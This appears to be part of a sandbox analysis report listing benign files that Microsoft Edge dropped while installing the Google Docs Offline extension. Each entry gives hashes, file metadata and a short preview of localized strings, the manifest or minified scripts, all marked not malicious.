SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
SHA-256:	5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
SHA-512:	FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\vi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	5.062722522759407
Encrypted:	false
SSDEEP:	24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
MD5:	773A3B9E708D052D6CBAA6D55C8A5438
SHA1:	5617235844595D5C73961A2C0A4AC66D8EA5F90F
SHA-256:	597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
SHA-512:	E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\zh_CN\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	5.7905809868505544
Encrypted:	false
SSDEEP:	12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
MD5:	3E76788E17E62FB49FB5ED5F4E7A3DCE
SHA1:	6904FFA0D13D45496F126E58C886C35366EFCC11
SHA-256:	E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
SHA-512:	F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\zh_HK\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1205
Entropy (8bit):	4.50367724745418
Encrypted:	false
SSDEEP:	24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
MD5:	524E1B2A370D0E71342D05DDE3D3E774
SHA1:	60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
SHA-256:	30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
SHA-512:	D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
Malicious:	false
Preview:	{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\zh_TW\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	843
Entropy (8bit):	5.76581227215314
Encrypted:	false
SSDEEP:	12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
MD5:	0E60627ACFD18F44D4DF469D8DCE6D30
SHA1:	2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
SHA-256:	F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
SHA-512:	6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\zu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	912
Entropy (8bit):	4.65963951143349
Encrypted:	false
SSDEEP:	24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
MD5:	71F916A64F98B6D1B5D1F62D297FDEC1
SHA1:	9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
SHA-256:	EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
SHA-512:	30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
Malicious:	false
Preview:	{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	11280
Entropy (8bit):	5.754230909218899
Encrypted:	false
SSDEEP:	192:RBG1G1UPkUj/86Op//Ier/2nsN9Jtwg1MK8HNnswuHEIIMuuqd7CKqv+pccW5SJ+:m8IGIEu8RfW+
MD5:	BE5DB35513DDEF454CE3502B6418B9B4
SHA1:	C82B23A82F745705AA6BCBBEFEB6CE3DBCC71CB1
SHA-256:	C6F623BE1112C2FDE6BE8941848A82B2292FCD2B475FBD363CC2FD4DF25049B5
SHA-512:	38C48E67631FAF0594D44525423C6EDC08F5A65F04288F0569B7CF8C71C359924069212462B0A2BFA38356F93708143EE1CBD42295D7317E8670D0A0CD10BAFD
Malicious:	false
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\dasherSettingSchema.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	854
Entropy (8bit):	4.284628987131403
Encrypted:	false
SSDEEP:	12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
MD5:	4EC1DF2DA46182103D2FFC3B92D20CA5
SHA1:	FB9D1BA3710CF31A87165317C6EDC110E98994CE
SHA-256:	6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
SHA-512:	939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
Malicious:	false
Preview:	{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2525
Entropy (8bit):	5.417689528134667
Encrypted:	false
SSDEEP:	24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj1e9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/APegiVb
MD5:	10FF8E5B674311683D27CE1879384954
SHA1:	9C269C14E067BB86642EB9F4816D75CF1B9B9158
SHA-256:	17363162A321625358255EE939F447E9363FF2284BD35AE15470FD5318132CA9
SHA-512:	4D3EB89D398A595FEA8B59AC6269A57CC96C4A0E5A5DB8C5FE70AB762E8144A5DF9AFC8756CA2E798E50778CD817CC9B0826FC2942DE31397E858DBFA1B06830
Malicious:	false
Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4369)
Category:	dropped
Size (bytes):	95567
Entropy (8bit):	5.4016395763198135
Encrypted:	false
SSDEEP:	1536:Ftd/mjDC/Hass/jCKLwPOPO2MCeYHxU2/NjAGHChg3JOzZ8:YfjCKdHm2/NbHCIJo8
MD5:	09AF2D8CFA8BF1078101DA78D09C4174
SHA1:	F2369551E2CDD86258062BEB0729EE4D93FCA050
SHA-256:	39D113C44D45AE3609B9509ED099680CC5FCEF182FD9745B303A76E164D8BCEC
SHA-512:	F791434B053FA2A5B731C60F22A4579F19FE741134EF0146E8BAC7DECAC78DE65915B3188093DBBE00F389A7F15B80172053FABB64E636DD4A945DBE3C2CF2E6
Malicious:	false
Preview:	'use strict';function aa(){return function(){}}function l(a){return function(){return this[a]}}var n;function ba(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ca="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function da(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=da(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&ca(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f\|\|"")+"_"+e++,f)}function c(f,

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4369)
Category:	dropped
Size (bytes):	103988
Entropy (8bit):	5.389407461078688
Encrypted:	false
SSDEEP:	1536:oXWJmOMsz9UqqRtjWLqj74SJf2VsxJ5BGOzr61SfwKmWGMJOaAFlObQ/x0BGm:yRqr6v3JnVzr6wwfMtkFSYm
MD5:	EA946F110850F17E637B15CF22B82837
SHA1:	8D27C963E76E3D2F5B8634EE66706F95F000FCAF
SHA-256:	029DFE87536E8907A612900B26EEAA72C63EDF28458A7227B295AE6D4E2BD94C
SHA-512:	5E8E61E648740FEF2E89A035A4349B2E4E5E4E88150EE1BDA9D4AD8D75827DC67C1C95A2CA41DF5B89DE8F575714E1A4D23BDE2DC3CF21D55DB3A39907B8F820
Malicious:	false
